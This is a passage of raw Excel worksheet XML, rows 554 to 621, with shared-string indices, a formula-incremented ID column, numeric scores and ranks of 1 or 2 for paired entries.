      <c r="B554" t="s">
        <v>1070</v>
      </c>
      <c r="C554">
        <f t="shared" si="8"/>
        <v>10123097</v>
      </c>
      <c r="D554" t="s">
        <v>1071</v>
      </c>
      <c r="E554">
        <v>31.14211273193359</v>
      </c>
      <c r="F554">
        <v>1</v>
      </c>
    </row>
    <row r="555" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A555" t="s">
        <v>1069</v>
      </c>
      <c r="B555" t="s">
        <v>1070</v>
      </c>
      <c r="C555">
        <f t="shared" si="8"/>
        <v>10124350</v>
      </c>
      <c r="D555" t="s">
        <v>1072</v>
      </c>
      <c r="E555">
        <v>6.2717266082763672</v>
      </c>
      <c r="F555">
        <v>2</v>
      </c>
    </row>
    <row r="556" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A556" t="s">
        <v>1073</v>
      </c>
      <c r="B556" t="s">
        <v>1074</v>
      </c>
      <c r="C556">
        <f t="shared" si="8"/>
        <v>10125603</v>
      </c>
      <c r="D556" t="s">
        <v>1075</v>
      </c>
      <c r="E556">
        <v>23.69419097900391</v>
      </c>
      <c r="F556">
        <v>1</v>
      </c>
    </row>
    <row r="557" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A557" t="s">
        <v>1073</v>
      </c>
      <c r="B557" t="s">
        <v>1074</v>
      </c>
      <c r="C557">
        <f t="shared" si="8"/>
        <v>10126856</v>
      </c>
      <c r="D557" t="s">
        <v>1076</v>
      </c>
      <c r="E557">
        <v>2.1789460442960258E-3</v>
      </c>
      <c r="F557">
        <v>2</v>
      </c>
    </row>
    <row r="558" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A558" t="s">
        <v>1077</v>
      </c>
      <c r="B558" t="s">
        <v>1078</v>
      </c>
      <c r="C558">
        <f t="shared" si="8"/>
        <v>10128109</v>
      </c>
      <c r="D558" t="s">
        <v>1079</v>
      </c>
      <c r="E558">
        <v>21.330287933349609</v>
      </c>
      <c r="F558">
        <v>1</v>
      </c>
    </row>
    <row r="559" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A559" t="s">
        <v>1077</v>
      </c>
      <c r="B559" t="s">
        <v>1078</v>
      </c>
      <c r="C559">
        <f t="shared" si="8"/>
        <v>10129362</v>
      </c>
      <c r="D559" t="s">
        <v>1080</v>
      </c>
      <c r="E559">
        <v>15.78758525848389</v>
      </c>
      <c r="F559">
        <v>2</v>
      </c>
    </row>
    <row r="560" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A560" t="s">
        <v>1081</v>
      </c>
      <c r="B560" t="s">
        <v>1082</v>
      </c>
      <c r="C560">
        <f t="shared" si="8"/>
        <v>10130615</v>
      </c>
      <c r="D560" t="s">
        <v>1083</v>
      </c>
      <c r="E560">
        <v>27.29747200012207</v>
      </c>
      <c r="F560">
        <v>1</v>
      </c>
    </row>
    <row r="561" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A561" t="s">
        <v>1081</v>
      </c>
      <c r="B561" t="s">
        <v>1082</v>
      </c>
      <c r="C561">
        <f t="shared" si="8"/>
        <v>10131868</v>
      </c>
      <c r="D561" t="s">
        <v>1084</v>
      </c>
      <c r="E561">
        <v>4.8750782012939453</v>
      </c>
      <c r="F561">
        <v>2</v>
      </c>
    </row>
    <row r="562" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A562" t="s">
        <v>1085</v>
      </c>
      <c r="B562" t="s">
        <v>1086</v>
      </c>
      <c r="C562">
        <f t="shared" si="8"/>
        <v>10133121</v>
      </c>
      <c r="D562" t="s">
        <v>1087</v>
      </c>
      <c r="E562">
        <v>27.409183502197269</v>
      </c>
      <c r="F562">
        <v>1</v>
      </c>
    </row>
    <row r="563" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A563" t="s">
        <v>1085</v>
      </c>
      <c r="B563" t="s">
        <v>1086</v>
      </c>
      <c r="C563">
        <f t="shared" si="8"/>
        <v>10134374</v>
      </c>
      <c r="D563" t="s">
        <v>1088</v>
      </c>
      <c r="E563">
        <v>11.79952812194824</v>
      </c>
      <c r="F563">
        <v>2</v>
      </c>
    </row>
    <row r="564" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A564" t="s">
        <v>1089</v>
      </c>
      <c r="B564" t="s">
        <v>1090</v>
      </c>
      <c r="C564">
        <f t="shared" si="8"/>
        <v>10135627</v>
      </c>
      <c r="D564" t="s">
        <v>1091</v>
      </c>
      <c r="E564">
        <v>24.680374145507809</v>
      </c>
      <c r="F564">
        <v>1</v>
      </c>
    </row>
    <row r="565" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A565" t="s">
        <v>1089</v>
      </c>
      <c r="B565" t="s">
        <v>1090</v>
      </c>
      <c r="C565">
        <f t="shared" si="8"/>
        <v>10136880</v>
      </c>
      <c r="D565" t="s">
        <v>1092</v>
      </c>
      <c r="E565">
        <v>14.65372371673584</v>
      </c>
      <c r="F565">
        <v>2</v>
      </c>
    </row>
    <row r="566" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A566" t="s">
        <v>1093</v>
      </c>
      <c r="B566" t="s">
        <v>1094</v>
      </c>
      <c r="C566">
        <f t="shared" si="8"/>
        <v>10138133</v>
      </c>
      <c r="D566" t="s">
        <v>1079</v>
      </c>
      <c r="E566">
        <v>24.277839660644531</v>
      </c>
      <c r="F566">
        <v>1</v>
      </c>
    </row>
    <row r="567" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A567" t="s">
        <v>1093</v>
      </c>
      <c r="B567" t="s">
        <v>1094</v>
      </c>
      <c r="C567">
        <f t="shared" si="8"/>
        <v>10139386</v>
      </c>
      <c r="D567" t="s">
        <v>1095</v>
      </c>
      <c r="E567">
        <v>1.4837027038083761E-6</v>
      </c>
      <c r="F567">
        <v>2</v>
      </c>
    </row>
    <row r="568" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A568" t="s">
        <v>1096</v>
      </c>
      <c r="B568" t="s">
        <v>1097</v>
      </c>
      <c r="C568">
        <f t="shared" si="8"/>
        <v>10140639</v>
      </c>
      <c r="D568" t="s">
        <v>1098</v>
      </c>
      <c r="E568">
        <v>30.91884613037109</v>
      </c>
      <c r="F568">
        <v>1</v>
      </c>
    </row>
    <row r="569" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A569" t="s">
        <v>1096</v>
      </c>
      <c r="B569" t="s">
        <v>1097</v>
      </c>
      <c r="C569">
        <f t="shared" si="8"/>
        <v>10141892</v>
      </c>
      <c r="D569" t="s">
        <v>1099</v>
      </c>
      <c r="E569">
        <v>4.9195866584777832</v>
      </c>
      <c r="F569">
        <v>2</v>
      </c>
    </row>
    <row r="570" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A570" t="s">
        <v>1100</v>
      </c>
      <c r="B570" t="s">
        <v>1101</v>
      </c>
      <c r="C570">
        <f t="shared" si="8"/>
        <v>10143145</v>
      </c>
      <c r="D570" t="s">
        <v>1102</v>
      </c>
      <c r="E570">
        <v>22.67987060546875</v>
      </c>
      <c r="F570">
        <v>1</v>
      </c>
    </row>
    <row r="571" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A571" t="s">
        <v>1100</v>
      </c>
      <c r="B571" t="s">
        <v>1101</v>
      </c>
      <c r="C571">
        <f t="shared" si="8"/>
        <v>10144398</v>
      </c>
      <c r="D571" t="s">
        <v>1103</v>
      </c>
      <c r="E571">
        <v>6.4138684272766113</v>
      </c>
      <c r="F571">
        <v>2</v>
      </c>
    </row>
    <row r="572" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A572" t="s">
        <v>1104</v>
      </c>
      <c r="B572" t="s">
        <v>1105</v>
      </c>
      <c r="C572">
        <f t="shared" si="8"/>
        <v>10145651</v>
      </c>
      <c r="D572" t="s">
        <v>1106</v>
      </c>
      <c r="E572">
        <v>20.73616790771484</v>
      </c>
      <c r="F572">
        <v>1</v>
      </c>
    </row>
    <row r="573" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A573" t="s">
        <v>1104</v>
      </c>
      <c r="B573" t="s">
        <v>1105</v>
      </c>
      <c r="C573">
        <f t="shared" si="8"/>
        <v>10146904</v>
      </c>
      <c r="D573" t="s">
        <v>1107</v>
      </c>
      <c r="E573">
        <v>15.669528007507321</v>
      </c>
      <c r="F573">
        <v>2</v>
      </c>
    </row>
    <row r="574" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A574" t="s">
        <v>1108</v>
      </c>
      <c r="B574" t="s">
        <v>1109</v>
      </c>
      <c r="C574">
        <f t="shared" si="8"/>
        <v>10148157</v>
      </c>
      <c r="D574" t="s">
        <v>526</v>
      </c>
      <c r="E574">
        <v>31.403474807739261</v>
      </c>
      <c r="F574">
        <v>1</v>
      </c>
    </row>
    <row r="575" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A575" t="s">
        <v>1108</v>
      </c>
      <c r="B575" t="s">
        <v>1109</v>
      </c>
      <c r="C575">
        <f t="shared" si="8"/>
        <v>10149410</v>
      </c>
      <c r="D575" t="s">
        <v>1110</v>
      </c>
      <c r="E575">
        <v>0.70736342668533325</v>
      </c>
      <c r="F575">
        <v>2</v>
      </c>
    </row>
    <row r="576" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A576" t="s">
        <v>1111</v>
      </c>
      <c r="B576" t="s">
        <v>1112</v>
      </c>
      <c r="C576">
        <f t="shared" si="8"/>
        <v>10150663</v>
      </c>
      <c r="D576" t="s">
        <v>1113</v>
      </c>
      <c r="E576">
        <v>35.962429046630859</v>
      </c>
      <c r="F576">
        <v>1</v>
      </c>
    </row>
    <row r="577" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A577" t="s">
        <v>1111</v>
      </c>
      <c r="B577" t="s">
        <v>1112</v>
      </c>
      <c r="C577">
        <f t="shared" si="8"/>
        <v>10151916</v>
      </c>
      <c r="D577" t="s">
        <v>1114</v>
      </c>
      <c r="E577">
        <v>13.055924415588381</v>
      </c>
      <c r="F577">
        <v>2</v>
      </c>
    </row>
    <row r="578" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A578" t="s">
        <v>1115</v>
      </c>
      <c r="B578" t="s">
        <v>1116</v>
      </c>
      <c r="C578">
        <f t="shared" si="8"/>
        <v>10153169</v>
      </c>
      <c r="D578" t="s">
        <v>1117</v>
      </c>
      <c r="E578">
        <v>20.1735725402832</v>
      </c>
      <c r="F578">
        <v>1</v>
      </c>
    </row>
    <row r="579" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A579" t="s">
        <v>1115</v>
      </c>
      <c r="B579" t="s">
        <v>1116</v>
      </c>
      <c r="C579">
        <f t="shared" si="8"/>
        <v>10154422</v>
      </c>
      <c r="D579" t="s">
        <v>1118</v>
      </c>
      <c r="E579">
        <v>10.138626098632811</v>
      </c>
      <c r="F579">
        <v>2</v>
      </c>
    </row>
    <row r="580" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A580" t="s">
        <v>1119</v>
      </c>
      <c r="B580" t="s">
        <v>1120</v>
      </c>
      <c r="C580">
        <f t="shared" si="8"/>
        <v>10155675</v>
      </c>
      <c r="D580" t="s">
        <v>1121</v>
      </c>
      <c r="E580">
        <v>24.476398468017582</v>
      </c>
      <c r="F580">
        <v>1</v>
      </c>
    </row>
    <row r="581" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A581" t="s">
        <v>1119</v>
      </c>
      <c r="B581" t="s">
        <v>1120</v>
      </c>
      <c r="C581">
        <f t="shared" si="8"/>
        <v>10156928</v>
      </c>
      <c r="D581" t="s">
        <v>1122</v>
      </c>
      <c r="E581">
        <v>16.38863372802734</v>
      </c>
      <c r="F581">
        <v>2</v>
      </c>
    </row>
    <row r="582" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A582" t="s">
        <v>1123</v>
      </c>
      <c r="B582" t="s">
        <v>1124</v>
      </c>
      <c r="C582">
        <f t="shared" si="8"/>
        <v>10158181</v>
      </c>
      <c r="D582" t="s">
        <v>1125</v>
      </c>
      <c r="E582">
        <v>19.076658248901371</v>
      </c>
      <c r="F582">
        <v>1</v>
      </c>
    </row>
    <row r="583" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A583" t="s">
        <v>1123</v>
      </c>
      <c r="B583" t="s">
        <v>1124</v>
      </c>
      <c r="C583">
        <f t="shared" si="8"/>
        <v>10159434</v>
      </c>
      <c r="D583" t="s">
        <v>1126</v>
      </c>
      <c r="E583">
        <v>5.9459547996520996</v>
      </c>
      <c r="F583">
        <v>2</v>
      </c>
    </row>
    <row r="584" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A584" t="s">
        <v>1127</v>
      </c>
      <c r="B584" t="s">
        <v>1128</v>
      </c>
      <c r="C584">
        <f t="shared" si="8"/>
        <v>10160687</v>
      </c>
      <c r="D584" t="s">
        <v>1129</v>
      </c>
      <c r="E584">
        <v>17.8671989440918</v>
      </c>
      <c r="F584">
        <v>1</v>
      </c>
    </row>
    <row r="585" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A585" t="s">
        <v>1127</v>
      </c>
      <c r="B585" t="s">
        <v>1128</v>
      </c>
      <c r="C585">
        <f t="shared" si="8"/>
        <v>10161940</v>
      </c>
      <c r="D585" t="s">
        <v>1130</v>
      </c>
      <c r="E585">
        <v>16.201778411865231</v>
      </c>
      <c r="F585">
        <v>2</v>
      </c>
    </row>
    <row r="586" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A586" t="s">
        <v>1131</v>
      </c>
      <c r="B586" t="s">
        <v>1132</v>
      </c>
      <c r="C586">
        <f t="shared" ref="C586:C649" si="9">C585+1253</f>
        <v>10163193</v>
      </c>
      <c r="D586" t="s">
        <v>1133</v>
      </c>
      <c r="E586">
        <v>22.413202285766602</v>
      </c>
      <c r="F586">
        <v>1</v>
      </c>
    </row>
    <row r="587" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A587" t="s">
        <v>1131</v>
      </c>
      <c r="B587" t="s">
        <v>1132</v>
      </c>
      <c r="C587">
        <f t="shared" si="9"/>
        <v>10164446</v>
      </c>
      <c r="D587" t="s">
        <v>1134</v>
      </c>
      <c r="E587">
        <v>3.2611051574349399E-3</v>
      </c>
      <c r="F587">
        <v>2</v>
      </c>
    </row>
    <row r="588" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A588" t="s">
        <v>1135</v>
      </c>
      <c r="B588" t="s">
        <v>1136</v>
      </c>
      <c r="C588">
        <f t="shared" si="9"/>
        <v>10165699</v>
      </c>
      <c r="D588" t="s">
        <v>1137</v>
      </c>
      <c r="E588">
        <v>31.26323318481445</v>
      </c>
      <c r="F588">
        <v>1</v>
      </c>
    </row>
    <row r="589" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A589" t="s">
        <v>1135</v>
      </c>
      <c r="B589" t="s">
        <v>1136</v>
      </c>
      <c r="C589">
        <f t="shared" si="9"/>
        <v>10166952</v>
      </c>
      <c r="D589" t="s">
        <v>1138</v>
      </c>
      <c r="E589">
        <v>8.1849918365478516</v>
      </c>
      <c r="F589">
        <v>2</v>
      </c>
    </row>
    <row r="590" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A590" t="s">
        <v>1139</v>
      </c>
      <c r="B590" t="s">
        <v>1140</v>
      </c>
      <c r="C590">
        <f t="shared" si="9"/>
        <v>10168205</v>
      </c>
      <c r="D590" t="s">
        <v>1141</v>
      </c>
      <c r="E590">
        <v>30.183170318603519</v>
      </c>
      <c r="F590">
        <v>1</v>
      </c>
    </row>
    <row r="591" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A591" t="s">
        <v>1139</v>
      </c>
      <c r="B591" t="s">
        <v>1140</v>
      </c>
      <c r="C591">
        <f t="shared" si="9"/>
        <v>10169458</v>
      </c>
      <c r="D591" t="s">
        <v>1142</v>
      </c>
      <c r="E591">
        <v>7.3748183250427246</v>
      </c>
      <c r="F591">
        <v>2</v>
      </c>
    </row>
    <row r="592" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A592" t="s">
        <v>1143</v>
      </c>
      <c r="B592" t="s">
        <v>1144</v>
      </c>
      <c r="C592">
        <f t="shared" si="9"/>
        <v>10170711</v>
      </c>
      <c r="D592" t="s">
        <v>1145</v>
      </c>
      <c r="E592">
        <v>20.712423324584961</v>
      </c>
      <c r="F592">
        <v>1</v>
      </c>
    </row>
    <row r="593" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A593" t="s">
        <v>1143</v>
      </c>
      <c r="B593" t="s">
        <v>1144</v>
      </c>
      <c r="C593">
        <f t="shared" si="9"/>
        <v>10171964</v>
      </c>
      <c r="D593" t="s">
        <v>1146</v>
      </c>
      <c r="E593">
        <v>1.1804095506668091</v>
      </c>
      <c r="F593">
        <v>2</v>
      </c>
    </row>
    <row r="594" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A594" t="s">
        <v>1147</v>
      </c>
      <c r="B594" t="s">
        <v>1148</v>
      </c>
      <c r="C594">
        <f t="shared" si="9"/>
        <v>10173217</v>
      </c>
      <c r="D594" t="s">
        <v>1149</v>
      </c>
      <c r="E594">
        <v>31.492000579833981</v>
      </c>
      <c r="F594">
        <v>1</v>
      </c>
    </row>
    <row r="595" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A595" t="s">
        <v>1147</v>
      </c>
      <c r="B595" t="s">
        <v>1148</v>
      </c>
      <c r="C595">
        <f t="shared" si="9"/>
        <v>10174470</v>
      </c>
      <c r="D595" t="s">
        <v>1150</v>
      </c>
      <c r="E595">
        <v>12.102762222290041</v>
      </c>
      <c r="F595">
        <v>2</v>
      </c>
    </row>
    <row r="596" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A596" t="s">
        <v>1151</v>
      </c>
      <c r="B596" t="s">
        <v>1152</v>
      </c>
      <c r="C596">
        <f t="shared" si="9"/>
        <v>10175723</v>
      </c>
      <c r="D596" t="s">
        <v>1153</v>
      </c>
      <c r="E596">
        <v>25.713909149169918</v>
      </c>
      <c r="F596">
        <v>1</v>
      </c>
    </row>
    <row r="597" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A597" t="s">
        <v>1151</v>
      </c>
      <c r="B597" t="s">
        <v>1152</v>
      </c>
      <c r="C597">
        <f t="shared" si="9"/>
        <v>10176976</v>
      </c>
      <c r="D597" t="s">
        <v>1154</v>
      </c>
      <c r="E597">
        <v>9.9302892684936523</v>
      </c>
      <c r="F597">
        <v>2</v>
      </c>
    </row>
    <row r="598" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A598" t="s">
        <v>1155</v>
      </c>
      <c r="B598" t="s">
        <v>1156</v>
      </c>
      <c r="C598">
        <f t="shared" si="9"/>
        <v>10178229</v>
      </c>
      <c r="D598" t="s">
        <v>1157</v>
      </c>
      <c r="E598">
        <v>23.609672546386719</v>
      </c>
      <c r="F598">
        <v>1</v>
      </c>
    </row>
    <row r="599" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A599" t="s">
        <v>1155</v>
      </c>
      <c r="B599" t="s">
        <v>1156</v>
      </c>
      <c r="C599">
        <f t="shared" si="9"/>
        <v>10179482</v>
      </c>
      <c r="D599" t="s">
        <v>1158</v>
      </c>
      <c r="E599">
        <v>10.641091346740721</v>
      </c>
      <c r="F599">
        <v>2</v>
      </c>
    </row>
    <row r="600" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A600" t="s">
        <v>1159</v>
      </c>
      <c r="B600" t="s">
        <v>1160</v>
      </c>
      <c r="C600">
        <f t="shared" si="9"/>
        <v>10180735</v>
      </c>
      <c r="D600" t="s">
        <v>1161</v>
      </c>
      <c r="E600">
        <v>28.672197341918949</v>
      </c>
      <c r="F600">
        <v>1</v>
      </c>
    </row>
    <row r="601" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A601" t="s">
        <v>1159</v>
      </c>
      <c r="B601" t="s">
        <v>1160</v>
      </c>
      <c r="C601">
        <f t="shared" si="9"/>
        <v>10181988</v>
      </c>
      <c r="D601" t="s">
        <v>1162</v>
      </c>
      <c r="E601">
        <v>1.332452774047852</v>
      </c>
      <c r="F601">
        <v>2</v>
      </c>
    </row>
    <row r="602" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A602" t="s">
        <v>1163</v>
      </c>
      <c r="B602" t="s">
        <v>1164</v>
      </c>
      <c r="C602">
        <f t="shared" si="9"/>
        <v>10183241</v>
      </c>
      <c r="D602" t="s">
        <v>1165</v>
      </c>
      <c r="E602">
        <v>30.11318206787109</v>
      </c>
      <c r="F602">
        <v>1</v>
      </c>
    </row>
    <row r="603" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A603" t="s">
        <v>1163</v>
      </c>
      <c r="B603" t="s">
        <v>1164</v>
      </c>
      <c r="C603">
        <f t="shared" si="9"/>
        <v>10184494</v>
      </c>
      <c r="D603" t="s">
        <v>1166</v>
      </c>
      <c r="E603">
        <v>8.2858209609985352</v>
      </c>
      <c r="F603">
        <v>2</v>
      </c>
    </row>
    <row r="604" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A604" t="s">
        <v>1167</v>
      </c>
      <c r="B604" t="s">
        <v>1168</v>
      </c>
      <c r="C604">
        <f t="shared" si="9"/>
        <v>10185747</v>
      </c>
      <c r="D604" t="s">
        <v>1169</v>
      </c>
      <c r="E604">
        <v>24.20720291137695</v>
      </c>
      <c r="F604">
        <v>1</v>
      </c>
    </row>
    <row r="605" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A605" t="s">
        <v>1167</v>
      </c>
      <c r="B605" t="s">
        <v>1168</v>
      </c>
      <c r="C605">
        <f t="shared" si="9"/>
        <v>10187000</v>
      </c>
      <c r="D605" t="s">
        <v>1170</v>
      </c>
      <c r="E605">
        <v>19.867002487182621</v>
      </c>
      <c r="F605">
        <v>2</v>
      </c>
    </row>
    <row r="606" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A606" t="s">
        <v>1171</v>
      </c>
      <c r="B606" t="s">
        <v>1172</v>
      </c>
      <c r="C606">
        <f t="shared" si="9"/>
        <v>10188253</v>
      </c>
      <c r="D606" t="s">
        <v>1173</v>
      </c>
      <c r="E606">
        <v>18.111324310302731</v>
      </c>
      <c r="F606">
        <v>1</v>
      </c>
    </row>
    <row r="607" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A607" t="s">
        <v>1171</v>
      </c>
      <c r="B607" t="s">
        <v>1172</v>
      </c>
      <c r="C607">
        <f t="shared" si="9"/>
        <v>10189506</v>
      </c>
      <c r="D607" t="s">
        <v>1174</v>
      </c>
      <c r="E607">
        <v>5.8871207237243652</v>
      </c>
      <c r="F607">
        <v>2</v>
      </c>
    </row>
    <row r="608" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A608" t="s">
        <v>1175</v>
      </c>
      <c r="B608" t="s">
        <v>1176</v>
      </c>
      <c r="C608">
        <f t="shared" si="9"/>
        <v>10190759</v>
      </c>
      <c r="D608" t="s">
        <v>1177</v>
      </c>
      <c r="E608">
        <v>28.926362991333011</v>
      </c>
      <c r="F608">
        <v>1</v>
      </c>
    </row>
    <row r="609" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A609" t="s">
        <v>1175</v>
      </c>
      <c r="B609" t="s">
        <v>1178</v>
      </c>
      <c r="C609">
        <f t="shared" si="9"/>
        <v>10192012</v>
      </c>
      <c r="D609" t="s">
        <v>1179</v>
      </c>
      <c r="E609">
        <v>5.6764078140258789</v>
      </c>
      <c r="F609">
        <v>2</v>
      </c>
    </row>
    <row r="610" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A610" t="s">
        <v>1180</v>
      </c>
      <c r="B610" t="s">
        <v>1181</v>
      </c>
      <c r="C610">
        <f t="shared" si="9"/>
        <v>10193265</v>
      </c>
      <c r="D610" t="s">
        <v>1182</v>
      </c>
      <c r="E610">
        <v>28.346738815307621</v>
      </c>
      <c r="F610">
        <v>1</v>
      </c>
    </row>
    <row r="611" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A611" t="s">
        <v>1180</v>
      </c>
      <c r="B611" t="s">
        <v>1181</v>
      </c>
      <c r="C611">
        <f t="shared" si="9"/>
        <v>10194518</v>
      </c>
      <c r="D611" t="s">
        <v>1183</v>
      </c>
      <c r="E611">
        <v>13.2034969329834</v>
      </c>
      <c r="F611">
        <v>2</v>
      </c>
    </row>
    <row r="612" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A612" t="s">
        <v>1184</v>
      </c>
      <c r="B612" t="s">
        <v>1185</v>
      </c>
      <c r="C612">
        <f t="shared" si="9"/>
        <v>10195771</v>
      </c>
      <c r="D612" t="s">
        <v>1186</v>
      </c>
      <c r="E612">
        <v>27.667255401611332</v>
      </c>
      <c r="F612">
        <v>1</v>
      </c>
    </row>
    <row r="613" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A613" t="s">
        <v>1184</v>
      </c>
      <c r="B613" t="s">
        <v>1185</v>
      </c>
      <c r="C613">
        <f t="shared" si="9"/>
        <v>10197024</v>
      </c>
      <c r="D613" t="s">
        <v>1187</v>
      </c>
      <c r="E613">
        <v>4.2471061460673809E-3</v>
      </c>
      <c r="F613">
        <v>2</v>
      </c>
    </row>
    <row r="614" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A614" t="s">
        <v>1188</v>
      </c>
      <c r="B614" t="s">
        <v>1189</v>
      </c>
      <c r="C614">
        <f t="shared" si="9"/>
        <v>10198277</v>
      </c>
      <c r="D614" t="s">
        <v>1190</v>
      </c>
      <c r="E614">
        <v>27.790399551391602</v>
      </c>
      <c r="F614">
        <v>1</v>
      </c>
    </row>
    <row r="615" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A615" t="s">
        <v>1188</v>
      </c>
      <c r="B615" t="s">
        <v>1189</v>
      </c>
      <c r="C615">
        <f t="shared" si="9"/>
        <v>10199530</v>
      </c>
      <c r="D615" t="s">
        <v>1191</v>
      </c>
      <c r="E615">
        <v>12.36638736724854</v>
      </c>
      <c r="F615">
        <v>2</v>
      </c>
    </row>
    <row r="616" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A616" t="s">
        <v>1192</v>
      </c>
      <c r="B616" t="s">
        <v>1193</v>
      </c>
      <c r="C616">
        <f t="shared" si="9"/>
        <v>10200783</v>
      </c>
      <c r="D616" t="s">
        <v>1194</v>
      </c>
      <c r="E616">
        <v>41.184413909912109</v>
      </c>
      <c r="F616">
        <v>1</v>
      </c>
    </row>
    <row r="617" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A617" t="s">
        <v>1192</v>
      </c>
      <c r="B617" t="s">
        <v>1193</v>
      </c>
      <c r="C617">
        <f t="shared" si="9"/>
        <v>10202036</v>
      </c>
      <c r="D617" t="s">
        <v>1195</v>
      </c>
      <c r="E617">
        <v>0.22517317533493039</v>
      </c>
      <c r="F617">
        <v>2</v>
      </c>
    </row>
    <row r="618" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A618" t="s">
        <v>1196</v>
      </c>
      <c r="B618" t="s">
        <v>1197</v>
      </c>
      <c r="C618">
        <f t="shared" si="9"/>
        <v>10203289</v>
      </c>
      <c r="D618" t="s">
        <v>1198</v>
      </c>
      <c r="E618">
        <v>28.465183258056641</v>
      </c>
      <c r="F618">
        <v>1</v>
      </c>
    </row>
    <row r="619" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A619" t="s">
        <v>1196</v>
      </c>
      <c r="B619" t="s">
        <v>1197</v>
      </c>
      <c r="C619">
        <f t="shared" si="9"/>
        <v>10204542</v>
      </c>
      <c r="D619" t="s">
        <v>1199</v>
      </c>
      <c r="E619">
        <v>2.860099077224731</v>
      </c>
      <c r="F619">
        <v>2</v>
      </c>
    </row>
    <row r="620" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A620" t="s">
        <v>1200</v>
      </c>
      <c r="B620" t="s">
        <v>1201</v>
      </c>
      <c r="C620">
        <f t="shared" si="9"/>
        <v>10205795</v>
      </c>
      <c r="D620" t="s">
        <v>1202</v>
      </c>
      <c r="E620">
        <v>11.74441623687744</v>
      </c>
      <c r="F620">
        <v>1</v>
      </c>
    </row>
    <row r="621" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A621" t="s">
        <v>1200</v>
      </c>
      <c r="B621" t="s">
